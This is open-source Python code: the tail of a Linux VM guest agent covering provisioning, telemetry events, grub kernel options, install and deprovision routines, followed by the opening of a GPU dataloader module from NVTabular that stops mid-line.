dom.childNodes[0] if node.localName != "HostingEnvironmentConfig": Error("HostingEnvironmentConfig.Parse: root not HostingEnvironmentConfig") return None self.ApplicationSettings = dom.getElementsByTagName("Setting") self.Certificates = dom.getElementsByTagName("StoredCertificate") return self def DecryptPassword(self, e): """ Return decrypted password. """ SetFileContents("password.p7m", "MIME-Version: 1.0\n" + "Content-Disposition: attachment; filename=\"password.p7m\"\n" + "Content-Type: application/x-pkcs7-mime; name=\"password.p7m\"\n" + "Content-Transfer-Encoding: base64\n\n" + textwrap.fill(e, 64)) return RunGetOutput(Openssl + " cms -decrypt -in password.p7m -inkey Certificates.pem -recip Certificates.pem")[ 1] def ActivateResourceDisk(self): return MyDistro.ActivateResourceDisk() def Process(self): """ Execute ActivateResourceDisk in separate thread. Create the user account. Launch ConfigurationConsumer if specified in the config. """ no_thread = False if DiskActivated == False: for m in inspect.getmembers(MyDistro): if 'ActivateResourceDiskNoThread' in m: no_thread = True break if no_thread == True: MyDistro.ActivateResourceDiskNoThread() else: diskThread = threading.Thread(target=self.ActivateResourceDisk) diskThread.start() User = None Pass = None Expiration = None Thumbprint = None for b in self.ApplicationSettings: sname = b.getAttribute("name") svalue = b.getAttribute("value") if User != None and Pass != None: if User != "root" and User != "" and Pass != "": CreateAccount(User, Pass, Expiration, Thumbprint) else: Error("Not creating user account: " + User) for c in self.Certificates: csha1 = c.getAttribute("certificateId").split(':')[1].upper() if os.path.isfile(csha1 + ".prv"): Log("Private key with thumbprint: " + csha1 + " was retrieved.") if os.path.isfile(csha1 + ".crt"): Log("Public cert with thumbprint: " + csha1 + " was retrieved.") program = Config.get("Role.ConfigurationConsumer") if program != None: try: Children.append(subprocess.Popen([program, LibDir + "/HostingEnvironmentConfig.xml"])) except OSError as e: ErrorWithPrefix('HostingEnvironmentConfig.Process', 'Exception: ' + str(e) + ' occured launching ' + program) class WALAEvent(object): def __init__(self): self.providerId = "" self.eventId = 1 self.OpcodeName = "" self.KeywordName = "" self.TaskName = "" self.TenantName = "" self.RoleName = "" self.RoleInstanceName = "" self.ContainerId = "" self.ExecutionMode = "IAAS" self.OSVersion = "" self.GAVersion = "" self.RAM = 0 self.Processors = 0 def ToXml(self): strEventid = u'<Event id="{0}"/>'.format(self.eventId) strProviderid = u'<Provider id="{0}"/>'.format(self.providerId) strRecordFormat = u'<Param Name="{0}" Value="{1}" T="{2}" />' strRecordNoQuoteFormat = u'<Param Name="{0}" Value={1} T="{2}" />' strMtStr = u'mt:wstr' strMtUInt64 = u'mt:uint64' strMtBool = u'mt:bool' strMtFloat = u'mt:float64' strEventsData = u"" for attName in self.__dict__: if attName in ["eventId", "filedCount", "providerId"]: continue attValue = self.__dict__[attName] if type(attValue) is int: strEventsData += strRecordFormat.format(attName, attValue, strMtUInt64) continue if type(attValue) is str: attValue = xml.sax.saxutils.quoteattr(attValue) strEventsData += strRecordNoQuoteFormat.format(attName, attValue, strMtStr) continue if str(type(attValue)).count("'unicode'") > 0: attValue = xml.sax.saxutils.quoteattr(attValue) strEventsData += strRecordNoQuoteFormat.format(attName, attValue, strMtStr) continue if type(attValue) is bool: strEventsData += strRecordFormat.format(attName, attValue, strMtBool) continue if type(attValue) is float: strEventsData += strRecordFormat.format(attName, attValue, strMtFloat) continue Log("Warning: property " + attName + ":" + str(type(attValue)) + ":type" + str( type(attValue)) + "Can't convert to events data:" + ":type not supported") return u"<Data>{0}{1}{2}</Data>".format(strProviderid, strEventid, strEventsData) def Save(self): eventfolder = LibDir + "/events" if not os.path.exists(eventfolder): os.mkdir(eventfolder) os.chmod(eventfolder, 0o700) if len(os.listdir(eventfolder)) > 1000: raise Exception("WriteToFolder:Too many file under " + eventfolder + " exit") filename = os.path.join(eventfolder, str(int(time.time() * 1000000))) with open(filename + ".tmp", 'wb+') as hfile: hfile.write(self.ToXml().encode("utf-8")) os.rename(filename + ".tmp", filename + ".tld") class WALAEventOperation: HeartBeat = "HeartBeat" Provision = "Provision" Install = "Install" UnIsntall = "UnInstall" Disable = "Disable" Enable = "Enable" Download = "Download" Upgrade = "Upgrade" Update = "Update" def AddExtensionEvent(name, op, isSuccess, duration=0, version="1.0", message="", type="", isInternal=False): event = ExtensionEvent() event.Name = name event.Version = version event.IsInternal = isInternal event.Operation = op event.OperationSuccess = isSuccess event.Message = message event.Duration = duration event.ExtensionType = type try: event.Save() except: Error("Error " + traceback.format_exc()) class ExtensionEvent(WALAEvent): def __init__(self): WALAEvent.__init__(self) self.eventId = 1 self.providerId = "69B669B9-4AF8-4C50-BDC4-6006FA76E975" self.Name = "" self.Version = "" self.IsInternal = False self.Operation = "" self.OperationSuccess = True self.ExtensionType = "" self.Message = "" self.Duration = 0 class WALAEventMonitor(WALAEvent): def __init__(self, postMethod): WALAEvent.__init__(self) self.post = postMethod self.sysInfo = {} self.eventdir = LibDir + "/events" self.issysteminfoinitilized = False def StartEventsLoop(self): eventThread = threading.Thread(target=self.EventsLoop) eventThread.setDaemon(True) eventThread.start() def EventsLoop(self): LastReportHeartBeatTime = datetime.datetime.min try: while True: if (datetime.datetime.now() - LastReportHeartBeatTime) > \ datetime.timedelta(minutes=30): LastReportHeartBeatTime = datetime.datetime.now() AddExtensionEvent(op=WALAEventOperation.HeartBeat, name="WALA", isSuccess=True) self.postNumbersInOneLoop = 0 self.CollectAndSendWALAEvents() time.sleep(60) except: Error("Exception in events loop:" + traceback.format_exc()) def SendEvent(self, providerid, events): dataFormat = u'<?xml version="1.0"?><TelemetryData version="1.0"><Provider id="{0}">{1}' \ '</Provider></TelemetryData>' data = dataFormat.format(providerid, events) self.post("/machine/?comp=telemetrydata", data) def CollectAndSendWALAEvents(self): if not os.path.exists(self.eventdir): return # Throtting, can't send more than 3 events in 15 seconds eventSendNumber = 0 eventFiles = os.listdir(self.eventdir) events = {} for file in eventFiles: if not file.endswith(".tld"): continue with open(os.path.join(self.eventdir, file), "rb") as hfile: # if fail to open or delete the file, throw exception xmlStr = hfile.read().decode("utf-8", 'ignore') os.remove(os.path.join(self.eventdir, file)) params = "" eventid = "" providerid = "" # if exception happen during process an event, catch it and continue try: xmlStr = self.AddSystemInfo(xmlStr) for node in xml.dom.minidom.parseString(xmlStr.encode("utf-8")).childNodes[0].childNodes: if node.tagName == "Param": params += node.toxml() if node.tagName == "Event": eventid = node.getAttribute("id") if node.tagName == "Provider": providerid = node.getAttribute("id") except: Error(traceback.format_exc()) continue if len(params) == 0 or len(eventid) == 0 or len(providerid) == 0: Error("Empty filed in params:" + params + " event id:" + eventid + " provider id:" + providerid) continue eventstr = u'<Event id="{0}"><![CDATA[{1}]]></Event>'.format(eventid, params) if not events.get(providerid): events[providerid] = "" if len(events[providerid]) > 0 and len(events.get(providerid) + eventstr) >= 63 * 1024: eventSendNumber += 1 self.SendEvent(providerid, events.get(providerid)) if eventSendNumber % 3 == 0: time.sleep(15) events[providerid] = "" if len(eventstr) >= 63 * 1024: Error("Signle event too large abort " + eventstr[:300]) continue events[providerid] = events.get(providerid) + eventstr for key in events.keys(): if len(events[key]) > 0: eventSendNumber += 1 self.SendEvent(key, events[key]) if eventSendNumber % 3 == 0: time.sleep(15) def AddSystemInfo(self, eventData): if not self.issysteminfoinitilized: self.issysteminfoinitilized = True try: self.sysInfo["OSVersion"] = platform.system() + ":" + "-".join(DistInfo(1)) + ":" + platform.release() self.sysInfo["GAVersion"] = GuestAgentVersion self.sysInfo["RAM"] = MyDistro.getTotalMemory() self.sysInfo["Processors"] = MyDistro.getProcessorCores() sharedConfig = xml.dom.minidom.parse("/var/lib/waagent/SharedConfig.xml").childNodes[0] hostEnvConfig = xml.dom.minidom.parse("/var/lib/waagent/HostingEnvironmentConfig.xml").childNodes[0] gfiles = RunGetOutput("ls -t /var/lib/waagent/GoalState.*.xml")[1] goalStateConfi = xml.dom.minidom.parse(gfiles.split("\n")[0]).childNodes[0] self.sysInfo["TenantName"] = hostEnvConfig.getElementsByTagName("Deployment")[0].getAttribute("name") self.sysInfo["RoleName"] = hostEnvConfig.getElementsByTagName("Role")[0].getAttribute("name") self.sysInfo["RoleInstanceName"] = sharedConfig.getElementsByTagName("Instance")[0].getAttribute("id") self.sysInfo["ContainerId"] = goalStateConfi.getElementsByTagName("ContainerId")[0].childNodes[ 0].nodeValue except: Error(traceback.format_exc()) eventObject = xml.dom.minidom.parseString(eventData.encode("utf-8")).childNodes[0] for node in eventObject.childNodes: if node.tagName == "Param": name = node.getAttribute("Name") if self.sysInfo.get(name): node.setAttribute("Value", xml.sax.saxutils.escape(str(self.sysInfo[name]))) return eventObject.toxml() WaagentLogrotate = """\ /var/log/waagent.log { monthly rotate 6 notifempty missingok } """ def GetMountPoint(mountlist, device): """ Example of mountlist: /dev/sda1 on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_u:object_r:tmpfs_t:s0") none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /dev/sdb1 on /mnt/resource type ext4 (rw) """ if (mountlist and device): for entry in mountlist.split('\n'): if (re.search(device, entry)): tokens = entry.split() # Return the 3rd column of this line return tokens[2] if len(tokens) > 2 else None return None def FindInLinuxKernelCmdline(option): """ Return match object if 'option' is present in the kernel boot options of the grub configuration. """ m = None matchs = r'^.*?' + MyDistro.grubKernelBootOptionsLine + r'.*?' + option + r'.*$' try: m = FindStringInFile(MyDistro.grubKernelBootOptionsFile, matchs) except IOError as e: Error( 'FindInLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str(e)) return m def AppendToLinuxKernelCmdline(option): """ Add 'option' to the kernel boot options of the grub configuration. """ if not FindInLinuxKernelCmdline(option): src = r'^(.*?' + MyDistro.grubKernelBootOptionsLine + r')(.*?)("?)$' rep = r'\1\2 ' + option + r'\3' try: ReplaceStringInFile(MyDistro.grubKernelBootOptionsFile, src, rep) except IOError as e: Error( 'AppendToLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str( e)) return 1 Run("update-grub", chk_err=False) return 0 def RemoveFromLinuxKernelCmdline(option): """ Remove 'option' to the kernel boot options of the grub configuration. """ if FindInLinuxKernelCmdline(option): src = r'^(.*?' + MyDistro.grubKernelBootOptionsLine + r'.*?)(' + option + r')(.*?)("?)$' rep = r'\1\3\4' try: ReplaceStringInFile(MyDistro.grubKernelBootOptionsFile, src, rep) except IOError as e: Error( 'RemoveFromLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str( e)) return 1 Run("update-grub", chk_err=False) return 0 def FindStringInFile(fname, matchs): """ Return match object if found in file. """ try: ms = re.compile(matchs) for l in (open(fname, 'r')).readlines(): m = re.search(ms, l) if m: return m except: raise return None def ReplaceStringInFile(fname, src, repl): """ Replace 'src' with 'repl' in file. """ try: sr = re.compile(src) if FindStringInFile(fname, src): updated = '' for l in (open(fname, 'r')).readlines(): n = re.sub(sr, repl, l) updated += n ReplaceFileContentsAtomic(fname, updated) except: raise return def ApplyVNUMAWorkaround(): """ If kernel version has NUMA bug, add 'numa=off' to kernel boot options. """ VersionParts = platform.release().replace('-', '.').split('.') if int(VersionParts[0]) > 2: return if int(VersionParts[1]) > 6: return if int(VersionParts[2]) > 37: return if AppendToLinuxKernelCmdline("numa=off") == 0: Log("Your kernel version " + platform.release() + " has a NUMA-related bug: NUMA has been disabled.") else: "Error adding 'numa=off'. NUMA has not been disabled." def RevertVNUMAWorkaround(): """ Remove 'numa=off' from kernel boot options. """ if RemoveFromLinuxKernelCmdline("numa=off") == 0: Log('NUMA has been re-enabled') else: Log('NUMA has not been re-enabled') def Install(): """ Install the agent service. Check dependencies. Create /etc/waagent.conf and move old version to /etc/waagent.conf.old Copy RulesFiles to /var/lib/waagent Create /etc/logrotate.d/waagent Set /etc/ssh/sshd_config ClientAliveInterval to 180 Call ApplyVNUMAWorkaround() """ if MyDistro.checkDependencies(): return 1 os.chmod(sys.argv[0], 0o755) SwitchCwd() for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Warn("Moved " + a + " -> " + LibDir + "/" + GetLastPathElement(a)) MyDistro.registerAgentService() if os.path.isfile("/etc/waagent.conf"): try: os.remove("/etc/waagent.conf.old") except: pass try: os.rename("/etc/waagent.conf", "/etc/waagent.conf.old") Warn("Existing /etc/waagent.conf has been renamed to /etc/waagent.conf.old") except: pass SetFileContents("/etc/waagent.conf", MyDistro.waagent_conf_file) SetFileContents("/etc/logrotate.d/waagent", WaagentLogrotate) filepath = "/etc/ssh/sshd_config" ReplaceFileContentsAtomic(filepath, "\n".join(filter(lambda a: not a.startswith("ClientAliveInterval"), GetFileContents(filepath).split( '\n'))) + "\nClientAliveInterval 180\n") Log("Configured SSH client probing to keep connections alive.") ApplyVNUMAWorkaround() return 0 def GetMyDistro(dist_class_name=''): """ Return MyDistro object. NOTE: Logging is not initialized at this point. """ if dist_class_name == '': if 'Linux' in platform.system(): Distro = DistInfo()[0] else: # I know this is not Linux! if 'FreeBSD' in platform.system(): Distro = platform.system() Distro = Distro.strip('"') Distro = Distro.strip(' ') dist_class_name = Distro + 'Distro' else: Distro = dist_class_name if dist_class_name not in globals(): ##print Distro + ' is not a supported distribution.' return None return globals()[dist_class_name]() # the distro class inside this module. def DistInfo(fullname=0): try: if 'FreeBSD' in platform.system(): release = re.sub('\-.*\Z', '', str(platform.release())) distinfo = ['FreeBSD', release] return distinfo if 'linux_distribution' in dir(platform): distinfo = list(platform.linux_distribution(full_distribution_name=0)) # remove trailing whitespace in distro name if(distinfo[0] == ''): osfile= open("/etc/os-release", "r") for line in osfile: lists=str(line).split("=") if(lists[0]== "NAME"): distname = lists[1].split("\"") distinfo[0] = distname[1] if(distinfo[0].lower() == "sles"): distinfo[0] = "SuSE" osfile.close() distinfo[0] = distinfo[0].strip() return distinfo else: return platform.dist() except Exception as e: errMsg = 'Failed to retrieve the distinfo with error: %s, stack trace: %s' % (str(e), traceback.format_exc()) logger.log(errMsg) distinfo = ['Abstract','1.0'] return distinfo def PackagedInstall(buildroot): """ Called from setup.py for use by RPM. Generic implementation Creates directories and files /etc/waagent.conf, /etc/init.d/waagent, /usr/sbin/waagent, /etc/logrotate.d/waagent, /etc/sudoers.d/waagent under buildroot. Copies generated files waagent.conf, into place and exits. """ MyDistro = GetMyDistro() if MyDistro == None: sys.exit(1) MyDistro.packagedInstall(buildroot) def LibraryInstall(buildroot): pass def Uninstall(): """ Uninstall the agent service. Copy RulesFiles back to original locations. Delete agent-related files. Call RevertVNUMAWorkaround(). """ SwitchCwd() for a in RulesFiles: if os.path.isfile(GetLastPathElement(a)): try: shutil.move(GetLastPathElement(a), a) Warn("Moved " + LibDir + "/" + GetLastPathElement(a) + " -> " + a) except: pass MyDistro.unregisterAgentService() MyDistro.uninstallDeleteFiles() RevertVNUMAWorkaround() return 0 def Deprovision(force, deluser): """ Remove user accounts created by provisioning. Disables root password if Provisioning.DeleteRootPassword = 'y' Stop agent service. Remove SSH host keys if they were generated by the provision. Set hostname to 'localhost.localdomain'. Delete cached system configuration files in /var/lib and /var/lib/waagent. """ # Append blank line at the end of file, so the ctime of this file is changed every time Run("echo ''>>" + MyDistro.getConfigurationPath()) SwitchCwd() print("WARNING! The waagent service will be stopped.") print("WARNING! All SSH host key pairs will be deleted.") print("WARNING! Cached DHCP leases will be deleted.") MyDistro.deprovisionWarnUser() delRootPass = Config.get("Provisioning.DeleteRootPassword") if delRootPass != None and delRootPass.lower().startswith("y"): print("WARNING! root password will be disabled. You will not be able to login as root.") try: input = raw_input except NameError: pass if force == False and not input('Do you want to proceed (y/n)? ').startswith('y'): return 1 MyDistro.stopAgentService() # Remove SSH host keys regenerateKeys = Config.get("Provisioning.RegenerateSshHostKeyPair") if regenerateKeys == None or regenerateKeys.lower().startswith("y"): Run("rm -f /etc/ssh/ssh_host_*key*") # Remove root password if delRootPass != None and delRootPass.lower().startswith("y"): MyDistro.deleteRootPassword() # Remove distribution specific networking configuration MyDistro.publishHostname('localhost.localdomain') MyDistro.deprovisionDeleteFiles() return 0 def SwitchCwd(): """ Switch to cwd to /var/lib/waagent. Create if not present. """ CreateDir(LibDir, "root", 0o700) os.chdir(LibDir) def Usage(): """ Print the arguments to waagent. """ print("usage: " + sys.argv[ 0] + " [-verbose] [-force] [-help|-install|-uninstall|-deprovision[+user]|-version|-serialconsole|-daemon]") return 0 def main(): """ Instantiate MyDistro, exit if distro class is not defined. Parse command-line arguments, exit with usage() on error. Instantiate ConfigurationProvider. Call appropriate non-daemon methods and exit. If daemon mode, enter Agent.Run() loop. """ if GuestAgentVersion == "": print("WARNING! This is a non-standard agent that does not include a valid version string.") if len(sys.argv) == 1: sys.exit(Usage()) LoggerInit('/var/log/waagent.log', '/dev/console') global LinuxDistro LinuxDistro = DistInfo()[0] global MyDistro MyDistro = GetMyDistro() if MyDistro == None: sys.exit(1) args = [] conf_file = None global force force = False for a in sys.argv[1:]: if re.match("^([-/]*)(help|usage|\?)", a): sys.exit(Usage()) elif re.match("^([-/]*)version", a): print(GuestAgentVersion + " running on " + LinuxDistro) sys.exit(0) elif re.match("^([-/]*)verbose", a): myLogger.verbose = True elif re.match("^([-/]*)force", a): force = True elif re.match("^(?:[-/]*)conf=.+", a): conf_file = re.match("^(?:[-/]*)conf=(.+)", a).groups()[0] elif re.match("^([-/]*)(setup|install)", a): sys.exit(MyDistro.Install()) elif re.match("^([-/]*)(uninstall)", a): sys.exit(Uninstall()) else: args.append(a) global Config Config = ConfigurationProvider(conf_file) logfile = Config.get("Logs.File") if logfile is not None: myLogger.file_path = logfile logconsole = Config.get("Logs.Console") if logconsole is not None and logconsole.lower().startswith("n"): myLogger.con_path = None verbose = Config.get("Logs.Verbose") if verbose != None and verbose.lower().startswith("y"): myLogger.verbose = True global daemon daemon = False for a in args: if re.match("^([-/]*)deprovision\+user", a): sys.exit(Deprovision(force, True)) elif re.match("^([-/]*)deprovision", a): sys.exit(Deprovision(force, False)) elif re.match("^([-/]*)daemon", a): daemon = True elif re.match("^([-/]*)serialconsole", a): AppendToLinuxKernelCmdline("console=ttyS0 earlyprintk=ttyS0") Log("Configured kernel to use ttyS0 as the boot console.") sys.exit(0) else: print("Invalid command line parameter:" + a) sys.exit(1) if daemon == False: sys.exit(Usage()) global modloaded modloaded = False while True: try: SwitchCwd() Log(GuestAgentLongName + " Version: " + GuestAgentVersion) if IsLinux(): Log("Linux Distribution Detected : " + LinuxDistro) except Exception as e: Error(traceback.format_exc()) Error("Exception: " + str(e)) Log("Restart agent in 15 seconds") time.sleep(15) if __name__ == '__main__': main()
backend.py
# # Copyright (c) 2021, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import math import queue import threading import warnings from collections import OrderedDict import cupy as cp from nvtabular.dispatch import _concat, _is_list_dtype, _make_df, _pull_apart_list from nvtabular.io.shuffle import _shuffle_df from nvtabular.ops import _get_embedding_order def _num_steps(num_samples, step_size): return math.ceil(num_samples / step_size) class ChunkQueue: """This class takes partitions (parts) from an NVTabular dataset and concatenates them into a cudf dataframe "chunk". This chunk is subsequently transformed into its tensor representation using the iterator's transform. Parameters ----------- qsize: int Max number of elements to hold in the buffer at once num_parts : int number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk" shuffle : bool enable/disable chunk-level shuffling put_wait: float amount of timeout to wait for a full queue to open up before checking for errors and trying again """ def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6): self.num_parts = num_parts self.shuffle = shuffle self.put_wait = put_wait self.q_out = queue.Queue(qsize) self._stop_event = threading.Event() indices = dataloader._gather_indices_for_dev(0) self.itr = dataloader.data.to_iter(indices=indices) self.dataloader = dataloader def __len__(self): return len(self.itr) @property def stopped(self): return self._stop_event.is_set() @property def empty(self): return self.q_out.empty() def get(self): return self.q_out.get() def put(self, packet): while True: if self.stopped: return True try: self.q_out.put(packet, timeout=self.put_wait) return False except queue.Full: continue def batch(self, itr): """ iterates through gpu_mem_frac size chunks of dataset and concatenates every `num_parts` of them. """ current = [] while True: try: value = next(itr) except StopIteration: if len(current) > 0: yield current break current.append(value) if len(current) == self.num_parts: yield current current = [] def chunk_logic(self, itr): spill = None for chunks in self.batch(itr): if self.stopped: return if spill and not spill.empty: chunks.insert(0, spill) chunks = _concat(chunks) chunks.reset_index(drop=True, inplace=True) chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size) if self.shuffle: chunks = _shuffle_df(chunks) if len(chunks) > 0: chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz) # put returns True if buffer is stopped before # packet can be put in queue. Keeps us from # freezing on a put on a full queue if self.put(chunks): return chunks = None # takes care final batch, which is less than batch size if not self.dataloader.drop_last and spill is not None and not spill.empty: spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz) self.put(spill) def load_chunks(self, dev): try: itr = iter(self.itr) if self.dataloader.device != "cpu": with self.dataloader._get_device_ctx(dev): self.chunk_logic(itr) else: self.chunk_logic(itr) except Exception as e: # pylint: disable=broad-except self.put(e) # For when an iterator is stopped before iteration is complete. def stop(self): self._stop_event.set() # TODO: should we be clearing? I can imagine a world where # you want the thread to stop but still want to grab # data out of the buffer self.q_out.queue.clear() def start(self): self._stop_event.clear() def get_batch_div_chunk(self, chunks, batch_size): # TODO: is there a way to do this using cupy? spill_idx = int(chunks.shape[0] / batch_size) * batch_size spill = _make_df(chunks.iloc[spill_idx:]) chunks = _make_df(chunks.iloc[:spill_idx]) if not chunks.empty: chunks.reset_index(drop=True, inplace=True) if not spill.empty: spill.reset_index(drop=True, inplace=True) return chunks, spill # TODO: implement as metaclass and assign methods to children # to avoid having to do Dataset.<method> calls? class DataLoader: _use_nnz = False def __init__( self, dataset, cat_names, cont_names, label_names, batch_size, shuffle, seed_fn=None, parts_per_chunk=1, device=None, global_size=None, global_rank=None, drop_last=False, sparse_names=None, sparse_max=None, sparse_as_dense=False, ): self.data = dataset self.indices = cp.arange(dataset.to_ddf().npartitions) self.drop_last = drop_last self.device = device or 0 self.sparse_names = sparse_names or [] self.sparse_max = sparse_max or {} self.sparse_as_dense = sparse_as_dense self.global_size = global_size or 1 self.global_rank = global_rank or 0 self.cat_names = cat_names or [] self.cont_names = cont_names or [] self.label_names = label_names self.batch_size = batch_size self.shuffle = shuffle self.seed_fn = seed_fn self.num_rows_processed = 0 # we set size of chunk queue to 1 we only want one chunk in queue at a time. self._buff = ChunkQueue(self, 1, num_parts=parts_per_chunk, shuffle=shuffle) # run once instead of everytime len called self._buff_len = len(self._buff) self._batch_itr = None self._workers = None def __len__(self): batches = _num_steps(self._buff_len, self.batch_size) if self.drop_last and self._buff_len % self.batch_size > 0: batches = batches - 1 return batches @property def _working(self): if self._workers is not None: return any(t.is_alive() for t in self._workers) return False def stop(self): # TODO: raise warning or even error if condition # isn't met? if self._workers is not None: if not self._buff.stopped: self._buff.stop() for t in self._workers: t.join() # remove joined threads from list self._workers = None self._buff.q_out.queue.clear() self._batch_itr = None def _gather_indices_for_dev(self, dev): # this should be self.indices divided by total processes, global set if len(self.indices) < self.global_size: warnings.warn( f"""You have more processes({self.global_size}) than dataset partitions({len(self.indices)}), reduce the number of processes.""" ) raise IndexError per_worker = _num_steps(len(self.indices), self.global_size) # identify process rank out of all processes (not local rank) start = self.global_rank * per_worker return self.indices[start : start + per_worker].tolist() def _generate_local_seed(self): random_state = cp.random.get_random_state() seeds = random_state.tomaxint(size=self.global_size) local_seed = seeds[self.global_rank] cp.random.seed(local_seed.get()) def _shuffle_indices(self): self._generate_local_seed() if self.seed_fn: new_seed = self.seed_fn() cp.random.seed(new_seed) cp.random.shuffle(self.indices) self._generate_local_seed() def __iter__(self): self.stop() self.num_rows_processed = 0 if self._buff.stopped: self._buff.start() # shuffle partition indices to bring disparate # parts of the dataset "close" to one another if self.shuffle: self._shuffle_indices() # build and start new threads for loading and # concatenating data self._workers = [] t = threading.Thread(target=self._buff.load_chunks, args=(self.device,)) t.daemon = True t.start() self._workers.append(t) return self def __next__(self): return self._get_next_batch() def _fetch_chunk(self): chunks = self._buff.get() if isinstance(chunks, Exception): self.stop() raise chunks self._batch_itr = iter(chunks) def _get_next_batch(self): """ adding this cheap shim so that we can call this step without it getting overridden by the framework-specific parent class's `__next__` method. TODO: can this be better solved with a metaclass implementation? My gut is that we don't actually necessarily *want*, in general, to be overriding __next__ and __iter__ methods """ # we've never initialized, do that now # need this because tf.keras.Model.fit will # call next() cold if self._workers is None: DataLoader.__iter__(self) # get the first chunks if self._batch_itr is None: self._fetch_chunk() # try to iterate through existing batches try: batch = next(self._batch_itr) except StopIteration: # anticipate any more chunks getting created # if not, raise the StopIteration if not self._working and self._buff.empty: self._workers = None self._batch_itr = None raise # otherwise get the next chunks and return # the first batch self._fetch_chunk() batch = next(self._batch_itr) # if batch[0] is empty but other exist for sub in batch: if sub is not None and len(sub) > 0: self.num_rows_processed += len(sub) break return batch def make_tensors(self, gdf, use_nnz=False): split_idx = self._get_segment_lengths(len(gdf)) # map from big chunk to framework-specific tensors chunks = self._create_tensors(gdf) # if we have any offsets, calculate nnzs up front if len(chunks) == 4: offsets = chunks[-1] if use_nnz: nnzs = offsets[1:] - offsets[:-1] chunks = chunks[:-1] # split them into batches and map to the framework-specific output format batches = [[] for _ in range(len(split_idx))] offset_idx = 0 for chunk in chunks: lists = None if isinstance(chunk, tuple): chunk, lists = chunk if len(split_idx) > 1 and chunk is not None: chunk = self._split_fn(chunk, split_idx) else: chunk = [chunk for _ in split_idx] if lists is not None: num_list_columns = len(lists) # grab the set of offsets and nnzs corresponding to # the list columns from this chunk chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns] if use_nnz: chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns] offset_idx += num_list_columns # split them into batches, including an extra 1 on the offsets # so we know how long the very last element is batch_offsets = self._split_fn(chunk_offsets, split_idx + [1]) if use_nnz and len(split_idx) > 1: batch_nnzs = self._split_fn(chunk_nnzs, split_idx) elif use_nnz: batch_nnzs = [chunk_nnzs] else: batch_nnzs = [None] * (len(batch_offsets) - 1) # group all these indices together and iterate through # them in batches to grab the proper elements from each # values tensor chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs) for n, c in enumerate(chunk): if isinstance(c, tuple): c, off0s, off1s, _nnzs = c offsets_split_idx = [1 for _ in range(num_list_columns)] off0s = self._split_fn(off0s, offsets_split_idx, axis=1) off1s = self._split_fn(off1s, offsets_split_idx, axis=1) if use_nnz: _nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1) # TODO: does this need to be ordereddict? batch_lists = {} for k, (column_name, values) in enumerate(lists.items()): off0, off1 = off0s[k], off1s[k] if use_nnz: nnz = _nnzs[k] # need to grab scalars for TF case if len(off0.shape) == 1: start, stop = off0[0], off1[0] elif len(off0.shape) == 2: start, stop = off0[0, 0], off1[0, 0] else: print(off0, off1) raise ValueError value = values[start:stop] index = off0 - start if not use_nnz else nnz batch_lists[column_name] = (value, index) c = (c, batch_lists) batches[n].append(c) return [self._handle_tensors(*batch) for batch in batches] def _get_segment_lengths(self, num_samples): """ Helper function to build indices to pass to <torch|tf>.split functions for breaking up into batches """ num_full_batches = _num_steps(num_samples, self.batch_size) - 1 idx = [self.batch_size for _ in range(num_full_batches)] idx.append(num_samples - num_full_batches * self.batch_size) return idx def _to_sparse_tensor(self, values_offset, column_name): """ Create a sparse representation of the input tensor. values_offset is either a tensor or a tuple of tensor, offset. """ seq_limit = self.sparse_max[column_name] values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset) max_seq_len = self._get_max_seq_len(diff_offsets) if max_seq_len > seq_limit: raise ValueError( "The default sequence length has been configured " + f"to {seq_limit} but the " + f"largest sequence in this batch have {max_seq_len} length" ) return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit) def _to_tensor(self, gdf, dtype=None): """ One of the mandatory functions a child class needs to implement. Maps from a cudf DataFrame to a tensor in the appropriate library, with an optional dtype kwarg to do explicit casting if need be """ raise NotImplementedError def _get_device_ctx(self, dev): """ One of the mandatory functions a child class needs to implement. Maps from a GPU index to a framework context object for placing tensors on specific GPUs """ raise NotImplementedError def _split_fn(self, tensor, idx, axis=0): raise NotImplementedError @property def _LONG_DTYPE(self): raise NotImplementedError @property def _FLOAT32_DTYPE(self): raise NotImplementedError def _separate_list_columns(self, gdf): lists, scalars = [], [] for col in gdf.columns: if _is_list_dtype(gdf[col]): lists.append(col) else: scalars.append(col) return _get_embedding_order(scalars), _get_embedding_order(lists) def _create_tensors(self, gdf): """ Breaks a dataframe down into the relevant categorical, continuous, and label tensors. Can be overrideen """ workflow_nodes = (self.cat_names, self.cont_names, self.label_names) dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE) tensors = [] offsets = _make_df(device=self.device) for column_names, dtype in zip(workflow_nodes, dtypes): if len(column_names) == 0: tensors.append(None) continue gdf_i = gdf[column_names] gdf.drop(columns=column_names, inplace=True) scalars, lists = self._separate_list_columns(gdf_i) x = None if scalars: # should always return dict column_name: values, offsets (optional) x = self._to_tensor(gdf_i[scalars], dtype) if lists: list_tensors = OrderedDict() for column_name in lists: column = gdf_i.pop(column_name) leaves, offsets[column_name] = 